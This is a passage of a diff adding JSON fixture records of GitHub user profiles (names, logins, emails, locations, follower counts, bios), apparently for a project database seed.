0, + "public_repositories_count": 2, + "created_at": "2010-06-11T19:00:20Z", + "updated_at": "2023-03-12T13:36:49Z", + "node_id": "MDQ6VXNlcjMwMzAyNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "svenfila" + } +}, +{ + "model": "github.user", + "pk": 1716, + "fields": { + "nest_created_at": "2024-09-12T00:24:57.231Z", + "nest_updated_at": "2024-09-12T00:24:57.231Z", + "name": "Juan Pablo Pidal López", + "login": "papidal", + "email": "juanpdl@servicioexterno.inditex.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1620855?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2012-04-07T09:57:59Z", + "updated_at": "2024-05-07T13:53:14Z", + "node_id": "MDQ6VXNlcjE2MjA4NTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1717, + "fields": { + "nest_created_at": "2024-09-12T00:24:58.039Z", + "nest_updated_at": "2024-09-12T00:24:58.039Z", + "name": "Steven Swor", + "login": "sworisbreathing", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1486524?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 6, + "public_repositories_count": 31, + "created_at": "2012-02-29T21:04:00Z", + "updated_at": "2024-07-19T02:58:09Z", + "node_id": "MDQ6VXNlcjE0ODY1MjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1718, + "fields": { + "nest_created_at": "2024-09-12T00:24:58.845Z", + "nest_updated_at": "2024-09-12T00:24:58.845Z", + "name": "Rodrigo", + "login": "romedeiro", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29693430?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 0, + "created_at": "2017-06-25T18:53:58Z", + "updated_at": "2024-08-29T17:16:01Z", + "node_id": "MDQ6VXNlcjI5NjkzNDMw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1719, + "fields": { + "nest_created_at": "2024-09-12T00:24:59.693Z", + "nest_updated_at": "2024-09-22T19:28:31.360Z", + "name": "", + "login": "RobertPaasche", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6502079?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-01-25T19:15:34Z", + "updated_at": "2022-03-23T10:13:17Z", + "node_id": "MDQ6VXNlcjY1MDIwNzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1720, + "fields": { + "nest_created_at": "2024-09-12T00:25:00.545Z", + "nest_updated_at": "2024-09-12T00:25:00.545Z", + "name": "jjYBdx4IL", + "login": "jjYBdx4IL", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/491220?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 6, + "public_gists_count": 4, + "public_repositories_count": 111, + "created_at": "2010-11-22T01:58:57Z", + "updated_at": "2024-08-30T08:18:26Z", + "node_id": "MDQ6VXNlcjQ5MTIyMA==", + "bio": "C++/C/Java dev.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1721, + "fields": { + "nest_created_at": "2024-09-12T00:25:02.206Z", + "nest_updated_at": "2024-09-12T00:25:02.206Z", + "name": "Sven Vowe", + "login": "nuclearglow", + "email": "svenvowe@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1580357?v=4", + "company": "", + "location": "Europe", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 13, + "public_gists_count": 24, + "public_repositories_count": 35, + "created_at": "2012-03-27T16:09:57Z", + "updated_at": "2024-09-09T11:30:37Z", + "node_id": "MDQ6VXNlcjE1ODAzNTc=", + "bio": "Full Stack Developer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1722, + "fields": { + "nest_created_at": "2024-09-12T00:25:03.486Z", + "nest_updated_at": "2024-09-12T00:25:03.486Z", + "name": "Stephan Markwalder", + "login": "smarkwal", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48734492?v=4", + "company": "", + "location": "Zurich, Switzerland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 9, + "created_at": "2019-03-19T20:08:27Z", + "updated_at": "2024-06-30T08:54:51Z", + "node_id": "MDQ6VXNlcjQ4NzM0NDky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1723, + "fields": { + "nest_created_at": "2024-09-12T00:25:04.679Z", + "nest_updated_at": "2024-09-12T00:25:04.680Z", + "name": "Saúl Piña", + "login": "sauljabin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5039802?v=4", + "company": "@littlehorse-enterprises", + "location": "Quito, Ecuador", + "collaborators_count": 0, + "following_count": 104, + "followers_count": 88, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2013-07-18T13:56:05Z", + "updated_at": "2024-09-03T22:15:24Z", + "node_id": "MDQ6VXNlcjUwMzk4MDI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1724, + "fields": { + "nest_created_at": "2024-09-12T00:25:06.322Z", + "nest_updated_at": "2024-09-12T00:25:06.322Z", + "name": "", + "login": "abvedire", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49322811?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-04-05T19:41:01Z", + "updated_at": "2019-04-05T19:43:32Z", + "node_id": "MDQ6VXNlcjQ5MzIyODEx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1725, + "fields": { + "nest_created_at": "2024-09-12T00:25:08.772Z", + "nest_updated_at": "2024-09-12T00:25:08.772Z", + "name": "", + "login": "christopher-gill", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10129886?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-12-09T13:22:18Z", + "updated_at": "2022-12-05T09:51:02Z", + "node_id": "MDQ6VXNlcjEwMTI5ODg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1726, + "fields": { + "nest_created_at": "2024-09-12T00:25:10.395Z", + "nest_updated_at": "2024-09-22T19:28:28.540Z", + "name": "James Ratzlaff", + "login": "jamesratzlaff", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3743806?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 24, + "created_at": "2013-03-02T00:11:59Z", + "updated_at": "2024-04-03T19:45:44Z", + "node_id": "MDQ6VXNlcjM3NDM4MDY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1727, + "fields": { + "nest_created_at": "2024-09-12T00:25:11.597Z", + "nest_updated_at": "2024-09-12T00:25:11.597Z", + "name": "Mario DeSousa", + "login": "mdesousa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1141403?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2011-10-20T18:03:24Z", + "updated_at": "2024-03-18T22:04:11Z", + "node_id": "MDQ6VXNlcjExNDE0MDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1728, + "fields": { + "nest_created_at": "2024-09-12T00:25:13.246Z", + "nest_updated_at": "2024-09-22T19:28:04.190Z", + "name": "Thibaut SEVERAC", + "login": "thib3113", + "email": "thib3113@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5489218?v=4", + "company": "@centreon", + "location": "Toulouse France", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 21, + "public_gists_count": 5, + "public_repositories_count": 79, + "created_at": "2013-09-18T18:55:50Z", + "updated_at": "2024-08-23T08:12:47Z", + "node_id": "MDQ6VXNlcjU0ODkyMTg=", + "bio": "Centreon Developper / OSS developper", + "is_hireable": false, + "twitter_username": "thib3113" + } +}, +{ + "model": "github.user", + "pk": 1729, + "fields": { + "nest_created_at": "2024-09-12T00:25:15.640Z", + "nest_updated_at": "2024-09-12T00:25:15.640Z", + "name": "SeA75", + "login": "SeA75", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17384582?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-02-21T15:39:53Z", + "updated_at": "2023-05-10T14:03:30Z", + "node_id": "MDQ6VXNlcjE3Mzg0NTgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1730, + "fields": { + "nest_created_at": "2024-09-12T00:25:16.926Z", + "nest_updated_at": "2024-09-12T00:25:16.926Z", + "name": "Eric", + "login": "ericbram", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6936019?v=4", + "company": "", + "location": "Salem, MA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2014-03-13T01:24:09Z", + "updated_at": "2024-08-24T15:25:52Z", + "node_id": "MDQ6VXNlcjY5MzYwMTk=", + "bio": "Senior CI/CD Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1731, + "fields": { + "nest_created_at": "2024-09-12T00:25:18.480Z", + "nest_updated_at": "2024-09-12T00:25:18.480Z", + "name": "Kevin Kessenich", + "login": "kessenich", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/27139487?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 8, + "created_at": "2017-04-09T11:45:14Z", + "updated_at": "2024-04-22T07:09:36Z", + "node_id": "MDQ6VXNlcjI3MTM5NDg3", + "bio": "Interested in web development with popular frameworks like Angular and React. Frontend is not enough, so as backend technologies I like .NET, NodeJS and Java", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1732, + "fields": { + "nest_created_at": "2024-09-12T00:25:20.939Z", + "nest_updated_at": "2024-09-12T00:25:20.939Z", + "name": "Patrick Kaeding", + "login": "pkaeding", + "email": "patrick@kaeding.name", + "avatar_url": "https://avatars.githubusercontent.com/u/13951?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 19, + "public_gists_count": 4, + "public_repositories_count": 47, + "created_at": "2008-06-16T20:37:10Z", + "updated_at": "2024-08-05T15:52:53Z", + "node_id": "MDQ6VXNlcjEzOTUx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1733, + "fields": { + "nest_created_at": "2024-09-12T00:25:22.225Z", + "nest_updated_at": "2024-09-22T19:29:05.043Z", + "name": "Andreas Mandel", + "login": "amandel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/593340?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2011-01-31T19:21:13Z", + "updated_at": "2024-08-14T09:55:41Z", + "node_id": "MDQ6VXNlcjU5MzM0MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1734, + "fields": { + "nest_created_at": "2024-09-12T00:25:23.482Z", + "nest_updated_at": "2024-09-12T00:25:23.483Z", + "name": "", + "login": "jmorte1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56366723?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-10-09T19:37:04Z", + "updated_at": "2019-10-09T19:37:05Z", + "node_id": "MDQ6VXNlcjU2MzY2NzIz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1735, + "fields": { + "nest_created_at": "2024-09-12T00:25:25.539Z", + "nest_updated_at": "2024-09-12T00:25:25.539Z", + "name": "Rand Hillerøe", + "login": "Silwing", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/186144?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2010-01-20T12:02:31Z", + "updated_at": "2024-08-06T12:01:09Z", + "node_id": "MDQ6VXNlcjE4NjE0NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1736, + "fields": { + "nest_created_at": "2024-09-12T00:25:26.745Z", + "nest_updated_at": "2024-09-12T00:25:26.745Z", + "name": "Armando Sosa", + "login": "ajsosa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41923324?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2018-07-30T17:47:58Z", + "updated_at": "2024-09-04T18:05:16Z", + "node_id": "MDQ6VXNlcjQxOTIzMzI0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1737, + "fields": { + "nest_created_at": "2024-09-12T00:25:29.631Z", + "nest_updated_at": "2024-09-12T00:25:29.631Z", + "name": "Matthew Bates", + "login": "LinkMJB", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8824103?v=4", + "company": "IBM", + "location": "Tucson, AZ", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 35, + "created_at": "2014-09-18T18:34:00Z", + "updated_at": "2024-06-12T20:42:56Z", + "node_id": "MDQ6VXNlcjg4MjQxMDM=", + "bio": "all your bateses are belong to us", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1738, + "fields": { + "nest_created_at": "2024-09-12T00:25:30.885Z", + "nest_updated_at": "2024-09-12T00:25:30.885Z", + "name": "", + "login": "yuliym", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6725070?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-02-19T09:13:32Z", + "updated_at": "2023-11-03T15:13:23Z", + "node_id": "MDQ6VXNlcjY3MjUwNzA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1739, + "fields": { + "nest_created_at": "2024-09-12T00:25:31.716Z", + "nest_updated_at": "2024-09-12T00:25:31.716Z", + "name": "mirabilos", + "login": "mirabilos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/861078?v=4", + "company": "", + "location": "Eifel-Ardennen", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 74, + "public_gists_count": 4, + "public_repositories_count": 50, + "created_at": "2011-06-20T07:22:34Z", + "updated_at": "2024-04-10T21:52:56Z", + "node_id": "MDQ6VXNlcjg2MTA3OA==", + "bio": "🇪🇺\r\nOpen Source. Free Sheet Music. Open Educational Resources. Few of my good stuff on this proprietary platform. https://launchpad.net/~mirabilos has links.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1740, + "fields": { + "nest_created_at": "2024-09-12T00:25:32.917Z", + "nest_updated_at": "2024-09-12T00:25:32.917Z", + "name": "Georg Tsakumagos", + "login": "G-Ork", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28452503?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2017-05-05T17:03:44Z", + "updated_at": "2024-05-12T17:01:46Z", + "node_id": "MDQ6VXNlcjI4NDUyNTAz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1741, + "fields": { + "nest_created_at": "2024-09-12T00:25:34.136Z", + "nest_updated_at": "2024-09-12T00:25:34.136Z", + "name": "zackq", + "login": "kyrogue", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/655464?v=4", + "company": "none", + "location": "singapore", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 3, + "public_repositories_count": 20, + "created_at": "2011-03-07T12:08:16Z", + "updated_at": "2024-09-03T07:27:35Z", + "node_id": "MDQ6VXNlcjY1NTQ2NA==", + "bio": "hello!", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1742, + "fields": { + "nest_created_at": "2024-09-12T00:25:35.348Z", + "nest_updated_at": "2024-09-22T19:45:09.149Z", + "name": "Ronald (Gundlach-Chmara) Chmara", + "login": "ronabop", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/76779?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 89, + "created_at": "2009-04-22T23:13:00Z", + "updated_at": "2024-09-15T20:41:41Z", + "node_id": "MDQ6VXNlcjc2Nzc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1743, + "fields": { + "nest_created_at": "2024-09-12T00:25:36.977Z", + "nest_updated_at": "2024-09-12T00:25:36.978Z", + "name": "Changhai Ke", + "login": "chnke", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30302546?v=4", + "company": "IBM", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-07-19T22:16:34Z", + "updated_at": "2024-08-29T07:39:04Z", + "node_id": "MDQ6VXNlcjMwMzAyNTQ2", + "bio": "Security architect, Decisions, IBM Cloud Pak for Automation", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1744, + "fields": { + "nest_created_at": "2024-09-12T00:25:38.176Z", + "nest_updated_at": "2024-09-12T00:33:59.966Z", + "name": "Dave Brosius", + "login": "mebigfatguy", + "email": "dbrosius@mebigfatguy.com", + "avatar_url": "https://avatars.githubusercontent.com/u/170161?v=4", + "company": "", + "location": "Eastern Shore, MD", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 101, + "public_gists_count": 1, + "public_repositories_count": 97, + "created_at": "2009-12-20T15:29:58Z", + "updated_at": "2024-07-01T13:53:55Z", + "node_id": "MDQ6VXNlcjE3MDE2MQ==", + "bio": "just a beaten up old man.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1745, + "fields": { + "nest_created_at": "2024-09-12T00:25:39.386Z", + "nest_updated_at": "2024-09-12T00:27:46.987Z", + "name": "", + "login": "Anshu2405", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53894207?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-08-08T07:17:05Z", + "updated_at": "2023-03-14T10:41:37Z", + "node_id": "MDQ6VXNlcjUzODk0MjA3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1746, + "fields": { + "nest_created_at": "2024-09-12T00:25:41.058Z", + "nest_updated_at": "2024-09-12T00:25:41.058Z", + "name": "nbinny", + "login": "greg64thomas", + "email": "greg.thomas@intel.com", + "avatar_url": "https://avatars.githubusercontent.com/u/60514140?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-01-31T14:49:44Z", + "updated_at": "2024-09-03T08:58:38Z", + "node_id": "MDQ6VXNlcjYwNTE0MTQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1747, + "fields": { + "nest_created_at": "2024-09-12T00:25:42.639Z", + "nest_updated_at": "2024-09-12T00:25:42.639Z", + "name": "Arnaud Quillaud", + "login": "arnaudq", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1408679?v=4", + "company": "", + "location": "Montpellier, France", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 2, + "created_at": "2012-02-04T20:26:01Z", + "updated_at": "2024-03-06T05:56:38Z", + "node_id": "MDQ6VXNlcjE0MDg2Nzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1748, + "fields": { + "nest_created_at": "2024-09-12T00:25:43.857Z", + "nest_updated_at": "2024-09-12T00:25:43.857Z", + "name": "Christian Fehlinger", + "login": "ChristianFehlinger", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3738607?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2013-03-01T13:45:37Z", + "updated_at": "2024-09-08T14:47:01Z", + "node_id": "MDQ6VXNlcjM3Mzg2MDc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1749, + "fields": { + "nest_created_at": "2024-09-12T00:25:45.035Z", + "nest_updated_at": "2024-09-12T00:26:58.056Z", + "name": "Alexandre", + "login": "aubertaa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14087776?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-09-02T06:59:10Z", + "updated_at": "2024-07-30T14:09:23Z", + "node_id": "MDQ6VXNlcjE0MDg3Nzc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1750, + "fields": { + "nest_created_at": "2024-09-12T00:25:46.662Z", + "nest_updated_at": "2024-09-12T00:25:46.662Z", + "name": "", + "login": "RyanMcC", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9652193?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-11-10T06:22:14Z", + "updated_at": "2024-05-20T20:07:52Z", + "node_id": "MDQ6VXNlcjk2NTIxOTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1751, + "fields": { + "nest_created_at": "2024-09-12T00:25:47.890Z", + "nest_updated_at": "2024-09-12T00:25:47.890Z", + "name": "", + "login": "mbalande1", + "email": "mbalande1@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/22912753?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-10-18T12:57:41Z", + "updated_at": "2022-08-23T10:26:35Z", + "node_id": "MDQ6VXNlcjIyOTEyNzUz", + "bio": "Software Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1752, + "fields": { + "nest_created_at": "2024-09-12T00:25:49.095Z", + "nest_updated_at": "2024-09-12T00:26:12.305Z", + "name": "Josef Sabongui", + "login": "saboacn14", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9450352?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 0, + "created_at": "2014-10-29T16:51:45Z", + "updated_at": "2024-03-02T09:14:04Z", + "node_id": "MDQ6VXNlcjk0NTAzNTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1753, + "fields": { + "nest_created_at": "2024-09-12T00:25:50.301Z", + "nest_updated_at": "2024-09-12T00:25:50.301Z", + "name": "Ilya Idamkin", + "login": "IdamkinI", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8385274?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-08-07T13:28:10Z", + "updated_at": "2023-10-14T07:36:57Z", + "node_id": "MDQ6VXNlcjgzODUyNzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1754, + "fields": { + "nest_created_at": "2024-09-12T00:25:52.358Z", + "nest_updated_at": "2024-09-12T00:25:52.358Z", + "name": "Andrew Bruce", + "login": "camelpunch", + "email": "me@andrewbruce.net", + "avatar_url": "https://avatars.githubusercontent.com/u/141733?v=4", + "company": "@code-supply ", + "location": "UK", + "collaborators_count": 0, + "following_count": 49, + "followers_count": 64, + "public_gists_count": 30, + "public_repositories_count": 162, + "created_at": "2009-10-19T16:26:45Z", + "updated_at": "2024-07-10T13:29:14Z", + "node_id": "MDQ6VXNlcjE0MTczMw==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1755, + "fields": { + "nest_created_at": "2024-09-12T00:25:54.358Z", + "nest_updated_at": "2024-09-12T00:25:54.358Z", + "name": "", + "login": "Simulant87", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5322205?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2013-08-27T15:14:36Z", + "updated_at": "2024-08-18T07:32:29Z", + "node_id": "MDQ6VXNlcjUzMjIyMDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1756, + "fields": { + "nest_created_at": "2024-09-12T00:25:55.562Z", + "nest_updated_at": "2024-09-12T00:25:59.237Z", + "name": "", + "login": "MichaelVetter", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7782813?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-06-03T15:43:04Z", + "updated_at": "2024-08-26T17:03:13Z", + "node_id": "MDQ6VXNlcjc3ODI4MTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1757, + "fields": { + "nest_created_at": "2024-09-12T00:26:00.438Z", + "nest_updated_at": "2024-09-22T19:27:54.828Z", + "name": "Hans Aikema", + "login": "aikebah", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2175611?v=4", + "company": "", + "location": "Nieuwegein, NL", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 11, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2012-08-18T17:12:08Z", + "updated_at": "2024-08-14T12:15:07Z", + "node_id": "MDQ6VXNlcjIxNzU2MTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1758, + "fields": { + "nest_created_at": "2024-09-12T00:26:01.706Z", + "nest_updated_at": "2024-09-12T00:26:01.706Z", + "name": "", + "login": "aehrlich", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/307733?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2010-06-17T14:12:33Z", + "updated_at": "2021-01-07T09:32:30Z", + "node_id": "MDQ6VXNlcjMwNzczMw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1759, + "fields": { + "nest_created_at": "2024-09-12T00:26:03.779Z", + "nest_updated_at": "2024-09-22T20:31:12.433Z", + "name": "", + "login": "kerberosmansour", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13433538?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 37, + "followers_count": 21, + "public_gists_count": 0, + "public_repositories_count": 47, + "created_at": "2015-07-21T10:39:02Z", + "updated_at": "2024-08-17T11:40:54Z", + "node_id": "MDQ6VXNlcjEzNDMzNTM4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1760, + "fields": { + "nest_created_at": "2024-09-12T00:26:04.959Z", + "nest_updated_at": "2024-09-12T00:26:04.959Z", + "name": "Gaweł Kazimierczuk", + "login": "kazigk", + "email": "contact@kazigk.me", + "avatar_url": "https://avatars.githubusercontent.com/u/8184274?v=4", + "company": "", + "location": "Wrocław, Poland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 21, + "public_gists_count": 2, + "public_repositories_count": 11, + "created_at": "2014-07-16T20:39:30Z", + "updated_at": "2024-08-14T11:23:40Z", + "node_id": "MDQ6VXNlcjgxODQyNzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1761, + "fields": { + "nest_created_at": "2024-09-12T00:26:06.194Z", + "nest_updated_at": "2024-09-12T00:26:06.194Z", + 